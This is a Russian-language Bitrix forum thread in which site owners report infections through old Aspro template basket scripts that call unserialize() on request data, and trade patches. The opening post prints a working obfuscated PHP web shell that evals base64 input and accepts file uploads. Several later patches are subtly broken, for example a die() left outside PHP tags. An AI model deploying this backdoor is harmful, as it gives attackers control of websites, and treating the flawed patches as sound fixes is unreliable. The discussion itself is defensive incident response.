Разработчикам

Заражение сайтов

Заглянувший

Сообщений: 22 Баллов: 2 Регистрация: 09.07.2020

30.01.2025 11:03:33

Сегодня обнаружил на нескольких сайтах (разные хостинги) в папке ajax файлы вида 5af47f5502b6.php со следующим кодом внутри:

php echo 409723*20;if(md5($_COOKIE['d'])=="\61\x37\60\62\x38\146\x34\70\67\143\142\x32\141\70\x34\x36\x30\67\x36\64\x36\x64\141\63\141\144\63\70\67\x38\145\143"){echo"\x6f\x6b";eval(base64_decode($_REQUEST['id']));if($_POST["\165\160"]=="\165\x70"){@copy($_FILES["\x66\151\x6c\x65"]["\164\155\x70\x5f\x6e\x61\x6d\x65"],$_FILES["\146\x69\154\x65"]["\156\141\155\x65"]);}}

Сайты обновлены.
Кто-то сталкивался уже с подобным? Может есть инфа откуда проникновение и какие меры можно принять?

Пользователь 1947629 Эксперт Сообщений: 922 Баллов: 191 Регистрация: 18.04.2018	#2 30.01.2025 14:14:09 как минимум обновиться до актуальной версии, там есть антивирус из коробки, с помощью которого можно проверить сайты

Пользователь 4418056

Заглянувший

Сообщений: 22 Баллов: 2 Регистрация: 09.07.2020

30.01.2025 14:16:19

Цитата
написал: как минимум обновиться до актуальной версии, там есть антивирус из коробки, с помощью которого можно проверить сайты

На сайте стоят все свежие обновления.
Антивирус в проактивной защите работает, ничего особого не показывает. Несколько подозрительных файлов удалил с его помощью. Хостинговый антивирус тоже ничего не показывает.

Пользователь 4097266 Постоянный посетитель Сообщений: 96 Баллов: 15 Регистрация: 06.04.2020	#4 30.01.2025 16:12:20 У нас такой список файлов

Пользователь 4418056

Заглянувший

Сообщений: 22 Баллов: 2 Регистрация: 09.07.2020

30.01.2025 16:22:49

Цитата
написал: У нас такой список файлов

Шаблон АСПРО случайно не стоит?

Пользователь 4097266

Постоянный посетитель

Сообщений: 96 Баллов: 15 Регистрация: 06.04.2020

30.01.2025 16:25:17

Цитата
написал: Шаблон АСПРО случайно не стоит?

Да, заражение связано из-за уязвимостей файлов шаблона АСПРО старой версии

Код

77.239.124.250 - - [30/Jan/2025:07:44:36 +0300 - 0.652] 500 "POST /ajax/show_basket_fly.php HTTP/1.1" 317 "https://домен/&quot; "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2801.89 Safari/537.36" "-"
77.239.124.250 - - [30/Jan/2025:07:44:38 +0300 - 0.543] 500 "POST /ajax/show_basket_popup.php HTTP/1.1" 313 "https://домен/ajax/show_basket_fly.php&quot; "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2801.89 Safari/537.36" "-"
77.239.124.250 - - [30/Jan/2025:07:44:39 +0300 - 0.467] 500 "POST /ajax/reload_basket_fly.php HTTP/1.1" 150 "https://домен/ajax/show_basket_popup.php&quot; "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2801.89 Safari/537.36" "-"
77.239.124.250 - - [30/Jan/2025:07:44:40 +0300 - 0.003] 200 "GET /ajax/f195bf25c3b0.php HTTP/1.1" 7 "https://домен/ajax/reload_basket_fly.php&quot; "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2801.89 Safari/537.36" "-"

Пользователь 4418056

Заглянувший

Сообщений: 22 Баллов: 2 Регистрация: 09.07.2020

30.01.2025 17:42:01

Цитата

написал:

Цитата
написал: Шаблон АСПРО случайно не стоит?

Да, заражение связано из-за уязвимостей файлов шаблона АСПРО старой версии

Код

  77.239  .124  .250  - - [ 30 /Jan/ 2025 : 07 : 44 : 36  + 0300  -  0.652 ]  500   "POST /ajax/show_basket_fly.php HTTP/1.1"   317   "https://домен/" " Mozilla/ 5.0  (X11; Ubuntu; Linux x86_64) AppleWebKit/ 537.36  (KHTML, like Gecko) Chrome/ 53.0  .2801  .89  Safari/ 537.36  " " - "
77.239.124.250 - - [30/Jan/2025:07:44:38 +0300 - 0.543] 500 " POST /ajax/show_basket_popup.php HTTP/ 1.1  " 313 " https: //домен/ajax/show_basket_fly.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2801.89 Safari/537.36" "-" 
 77.239  .124  .250  - - [ 30 /Jan/ 2025 : 07 : 44 : 39  + 0300  -  0.467 ]  500   "POST /ajax/reload_basket_fly.php HTTP/1.1"   150   "https://домен/ajax/show_basket_popup.php" " Mozilla/ 5.0  (X11; Ubuntu; Linux x86_64) AppleWebKit/ 537.36  (KHTML, like Gecko) Chrome/ 53.0  .2801  .89  Safari/ 537.36  " " - "
77.239.124.250 - - [30/Jan/2025:07:44:40 +0300 - 0.003] 200 " GET /ajax/f195bf25c3b0.php HTTP/ 1.1  " 7 " https: //домен/ajax/reload_basket_fly.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2801.89 Safari/537.36" "-"

Есть ли какое-то решение, без обновления шаблона АСПРО? у меня это не возможно по нескольким причинам.

Пользователь 4097266

Постоянный посетитель

Сообщений: 96 Баллов: 15 Регистрация: 06.04.2020

31.01.2025 09:55:45

Цитата
написал: Есть ли какое-то решение, без обновления шаблона АСПРО? у меня это не возможно по нескольким причинам.

В файлах show_basket_fly, show_basket_popup, reload_basket_fly заменить unserialize() на json_decode()

Пример как реализовал я

Код

<?php
define("STATISTIC_SKIP_ACTIVITY_CHECK", "true");
require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_before.php");

if (isset($_REQUEST["PARAMS"]) && !empty($_REQUEST["PARAMS"])) {
    $paramsJson = urldecode($_REQUEST["PARAMS"]);
    $arParams = json_decode($paramsJson, true);

    if (!is_array($arParams)) {
        die("Ошибка: Некорректные параметры.");
    }

    ?>
    <div id="basket_preload">
        <?php include_once("action_basket.php"); ?>
        <?php
        $APPLICATION->IncludeComponent(
            "bitrix:sale.basket.basket", 
            "fly", 
            $arParams, 
            false, 
            array("HIDE_ICONS" => "Y")
        );
        ?>
    </div>
    <?php
}
?>

Пользователь 4418056

Заглянувший

Сообщений: 22 Баллов: 2 Регистрация: 09.07.2020

31.01.2025 10:39:32

Цитата

написал:

Цитата
написал: Есть ли какое-то решение, без обновления шаблона АСПРО? у меня это не возможно по нескольким причинам.

В файлах show_basket_fly, show_basket_popup, reload_basket_fly заменить unserialize() на json_decode()

Пример как реализовал я

Код

 <?php
define("STATISTIC_SKIP_ACTIVITY_CHECK", "true");
require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_before.php");

if (isset($_REQUEST["PARAMS"]) && !empty($_REQUEST["PARAMS"])) {
    $paramsJson = urldecode($_REQUEST["PARAMS"]);
    $arParams = json_decode($paramsJson, true);

    if (!is_array($arParams)) {
        die("Ошибка: Некорректные параметры.");
    }

    ?>
    <div id="basket_preload">
        <?php include_once("action_basket.php"); ?>
        <?php
        $APPLICATION->IncludeComponent(
            "bitrix:sale.basket.basket", 
            "fly", 
            $arParams, 
            false, 
            array("HIDE_ICONS" => "Y")
        );
        ?>
    </div>
    <?php
}
?>

Я пробовал просто поменять unserialize на json_decode($_REQUEST["PARAMS"]) и это ломает обновление данных в корзине при добавлении очередного товара, особенно ломается все, если удалить из корзины что-то или полностью ее очистить, тогда при последующем добавлении эти товары не появляются в отображении корзины в шапке сайта. Если обновить страницу, то товары отобразятся. Так же, если какое-то время добавлять эти товары, то может начать отображать, а может и не начать. Очень странное поведение...
Ваш код так же ломет корзину в меню. При добавлении очередного товара пишет Некорректные данные. У вас с этим нет проблем? Может еще в каких-то файлах нужны правки?

Пользователь 1947629

Эксперт

Сообщений: 922 Баллов: 191 Регистрация: 18.04.2018

#10

31.01.2025 10:44:55

и так не работает?

Код
json_decode($_REQUEST["PARAMS"], 1)

Пользователь 4418056 Заглянувший Сообщений: 22 Баллов: 2 Регистрация: 09.07.2020	#11 31.01.2025 11:06:28 увы, но нет. корзина не отображает добавленный только что товар.

Пользователь 4097266

Постоянный посетитель

Сообщений: 96 Баллов: 15 Регистрация: 06.04.2020

#12

31.01.2025 12:56:20

Цитата
написал: У вас с этим нет проблем?

У нас проблем нет, работает

Пользователь 4418056

Заглянувший

Сообщений: 22 Баллов: 2 Регистрация: 09.07.2020

#13

31.01.2025 13:40:35

Цитата

написал:

Цитата
написал: У вас с этим нет проблем?

У нас проблем нет, работает

А какая версия шаблона АСПРО у вас? У меня на проблемном сайте Aspro Optimus. На другом сайте где тоже Aspro, но Next пробем нет после такой подмены.

Пользователь 4097266

Постоянный посетитель

Сообщений: 96 Баллов: 15 Регистрация: 06.04.2020

#14

31.01.2025 15:46:58

Цитата

написал:

Цитата

написал:

Цитата
написал: У вас с этим нет проблем?

У нас проблем нет, работает

Аспо Макс

Пользователь 1315563 Заглянувший Сообщений: 4 Регистрация: 28.02.2023	#15 31.01.2025 19:27:03 Следующим этапом дописывает в папки .htaccess собственные и php.ini Пытается перенаправлять на свои файлы.

Пользователь 492795 Заглянувший Сообщений: 16 Баллов: 1 Регистрация: 22.02.2016	#16 03.02.2025 09:01:05 Через include/mainpage/comp_catalog_ajax.php еще ломают Аспро Максимум

Пользователь 399907 Посетитель Сообщений: 38 Баллов: 8 Регистрация: 22.10.2015	#17 03.02.2025 09:39:45 Такая же проблема. Пока поставили на папку ajax доступ 500. Так же на копии будем думать, как поправить проблему!

Пользователь 4418056

Заглянувший

Сообщений: 22 Баллов: 2 Регистрация: 09.07.2020

#18

03.02.2025 10:43:47

Цитата
написал: Такая же проблема. Пока поставили на папку ajax доступ 500. Так же на копии будем думать, как поправить проблему!

Доступ 500 решает проблему и не ломает функционал?

Если найдете решение, отпишите пожалуйста. Сейчас пока только вижу вариант перевести этот элемент корзины на типовое решение, но очень не хочется переверстывать шаблон.

Пользователь 4418056

Заглянувший

Сообщений: 22 Баллов: 2 Регистрация: 09.07.2020

#19

03.02.2025 10:46:03

Цитата
написал: Через include/mainpage/comp_catalog_ajax.php еще ломают Аспро Максимум

А что они там пытаются выцепить? Как можно защитить?

Пользователь 492795

Заглянувший

Сообщений: 16 Баллов: 1 Регистрация: 22.02.2016

#20

03.02.2025 11:05:39

Код
А что они там пытаются выцепить? Как можно защитить?

Тоже, что и в прочих скриптах, unserialize(urldecode ...

Над защитой думаем

Пользователь 6753970

Заглянувший

Сообщений: 2 Регистрация: 14.11.2022

#21

03.02.2025 11:20:58

А если вот так, в /include/mainpage/comp_catalog_ajax.php ?

Код

/*
---- Было
$arIncludeParams = ($bAjaxMode ? $_POST["AJAX_PARAMS"] : $arParamsTmp);
$arGlobalFilter = ($bAjaxMode ? unserialize(urldecode($_POST["GLOBAL_FILTER"])) : ($_GET['GLOBAL_FILTER'] ? unserialize(urldecode($_GET['GLOBAL_FILTER'])) : array()));
$arComponentParams = unserialize(urldecode($arIncludeParams));
*/

// ---- Стало
$arIncludeParams = $arParamsTmp;
$arGlobalFilter = [];
$arComponentParams = unserialize(urldecode($arIncludeParams));

Пользователь 4097266

Постоянный посетитель

Сообщений: 96 Баллов: 15 Регистрация: 06.04.2020

#22

03.02.2025 12:00:06

Цитата
написал: Через include/mainpage/comp_catalog_ajax.php еще ломают Аспро Максимум

Да, сегодня загрузили файл через него

Пользователь 8745548

Заглянувший

Сообщений: 7 Регистрация: 03.02.2025

#23

03.02.2025 13:24:14

Тоже наблюдаю подобное с 29-го января. Антивирус хостера ругаться начал. Древний Аспро Некст и старый битрикс. Битриксовые дыры от 2022 года уже пропатчены. Лезут, судя по логам, именно через эти файлы корзины. Внес правки в три файла, вернул доступ к папке ajax. Понаблюдаю, будут ли ломиться через /include/mainpage/comp_catalog_ajax.php

Пользователь 4418056

Заглянувший

Сообщений: 22 Баллов: 2 Регистрация: 09.07.2020

#24

03.02.2025 13:26:51

Цитата

написал:
Тоже наблюдаю подобное с 29-го января. Антивирус хостера ругаться начал. Древний Аспро Некст и старый битрикс. Битриксовые дыры от 2022 года уже пропатчены. Лезут, судя по логам, именно через эти файлы корзины. Внес правки в три файла, вернул доступ к папке ajax. Понаблюдаю, будут ли ломиться через /include/mainpage/comp_catalog_ajax.php

Как правили файлы, как расписано выше? Не поломало ли функционал корзины?

Пользователь 8745548

Заглянувший

Сообщений: 7 Регистрация: 03.02.2025

#25

03.02.2025 13:30:22

Просьба умеющим в php, написать, правильно ли я внёс правки? Делал по интуиции и вообще не моя область. Сама корзина вроде работает нормально.

reload_basket_fly.php

Код

<?define("STATISTIC_SKIP_ACTIVITY_CHECK", "true");?>
<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_before.php");?>
<?if (isset($_REQUEST["PARAMS"]) && !empty($_REQUEST["PARAMS"])):?>
   <?$paramsJson = urldecode($_REQUEST["PARAMS"]);?>
        <?$arParams = json_decode($paramsJson, true);?>
   <?if (!is_array($arParams)):?>
           die("Ошибка: Некорректные параметры.");
        <?endif;?>
   <?include_once("action_basket.php");?>
   <?/*$arParams = unserialize(urldecode($_REQUEST["PARAMS"]));*/?>
   <?$arParams['INNER']=true;?>
   <?$APPLICATION->IncludeComponent("bitrix:sale.basket.basket", "fly", $arParams, false, array("HIDE_ICONS" =>"Y"));?>   
<?endif;?>

show_basket_popup.php

Код

<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_before.php");?>
<div id="basket_preload">
<?$paramsJson = urldecode($_REQUEST["PARAMS"]);?>
<?$arParams = json_decode($paramsJson, true);?>
<?if (!is_array($arParams)):?>
    die("Ошибка: Некорректные параметры.");
<?endif;?>
<?include_once("action_basket.php");?>
<?/*$arParams = unserialize(urldecode($_REQUEST["PARAMS"]));*/?>

<?$APPLICATION->IncludeComponent( "bitrix:sale.basket.basket.line", "normal", $arParams, false, array("HIDE_ICONS" =>"Y") );?>
</div>

show_basket_fly.php

Код

<?define("STATISTIC_SKIP_ACTIVITY_CHECK", "true");?>
<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_before.php");?>
<?if (isset($_REQUEST["PARAMS"]) && !empty($_REQUEST["PARAMS"])):?>
   <?$paramsJson = urldecode($_REQUEST["PARAMS"]);?>
        <?$arParams = json_decode($paramsJson, true);?>
   <?if (!is_array($arParams)):?>
           die("Ошибка: Некорректные параметры.");
        <?endif;?>
   <div id="basket_preload">
      <?include_once("action_basket.php");?>
      <?/*$arParams = unserialize(urldecode($_REQUEST["PARAMS"]));*/?>
      <?$APPLICATION->IncludeComponent("bitrix:sale.basket.basket", "fly", $arParams, false, array("HIDE_ICONS" =>"Y"));?>
   </div>
<?endif;?>

Заражение сайтов

Продукты

Управление сайтом

Битрикс24

Интернет-магазин + CRM

Решения

Для интернет-магазинов

Каталог готовых решений

Внедрение

Выбрать партнера

Проверить партнера

Стать партнером